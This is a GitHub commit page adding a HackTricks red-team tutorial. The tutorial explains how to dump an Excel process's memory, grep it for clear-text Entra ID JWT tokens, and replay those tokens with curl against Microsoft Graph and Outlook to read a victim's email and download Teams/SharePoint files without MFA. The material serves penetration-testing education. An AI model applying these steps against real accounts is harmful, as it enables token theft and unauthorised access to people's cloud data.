-
Notifications
You must be signed in to change notification settings - Fork 256
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
eabd436
commit e15f924
Showing
3 changed files
with
67 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
65 changes: 65 additions & 0 deletions
65
...-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,65 @@ | ||
| # Az - Processes Memory Access Token | ||
|
|
||
| {% hint style="success" %} | ||
| Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\ | ||
| Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) | ||
|
|
||
| <details> | ||
|
|
||
| <summary>Support HackTricks</summary> | ||
|
|
||
| * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! | ||
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
| * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
|
||
| </details> | ||
| {% endhint %} | ||
|
|
||
| ## **Basic Information** | ||
|
|
||
| As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA. | ||
|
|
||
| Steps: | ||
|
|
||
| 1. Dump the excel processes syncronized with in EntraID user with your favourite tool. | ||
| 2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output | ||
| 3. Find the tokens that interest you the most and run tools over them: | ||
|
|
||
| {% code overflow="wrap" %} | ||
| ```bash | ||
| # Check the identity of the token | ||
| curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/me | jq | ||
|
|
||
| # Check the email (you need a token authorized in login.microsoftonline.com) | ||
| curl -s -H "Authorization: Bearer <token>" https://outlook.office.com/api/v2.0/me/messages | jq | ||
|
|
||
| # Download a file from Teams | ||
| ## You need a token that can access graph.microsoft.com | ||
| ## Then, find the <site_id> inside the memory and call | ||
| curl -s -H "Authorization: Bearer <token>" https://graph.microsoft.com/v1.0/sites/<site_id>/drives | jq | ||
|
|
||
| ## Then, list one drive | ||
| curl -s -H "Authorization: Bearer <token>" 'https://graph.microsoft.com/v1.0/sites/<site_id>/drives/<drive_id>' | jq | ||
|
|
||
| ## Finally, download a file from that drive: | ||
| ┌──(magichk㉿black-pearl)-[~] | ||
| └─$ curl -o <filename_output> -L -H "Authorization: Bearer <token>" '<@microsoft.graph.downloadUrl>' | ||
| ``` | ||
| {% endcode %} | ||
|
|
||
| **Note that these kind of access tokens can be also found inside other processes.** | ||
|
|
||
| {% hint style="success" %} | ||
| Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image.png" alt="" data-size="line">\ | ||
| Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte) | ||
|
|
||
| <details> | ||
|
|
||
| <summary>Support HackTricks</summary> | ||
|
|
||
| * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! | ||
| * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** | ||
| * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. | ||
|
|
||
| </details> | ||
| {% endhint %} |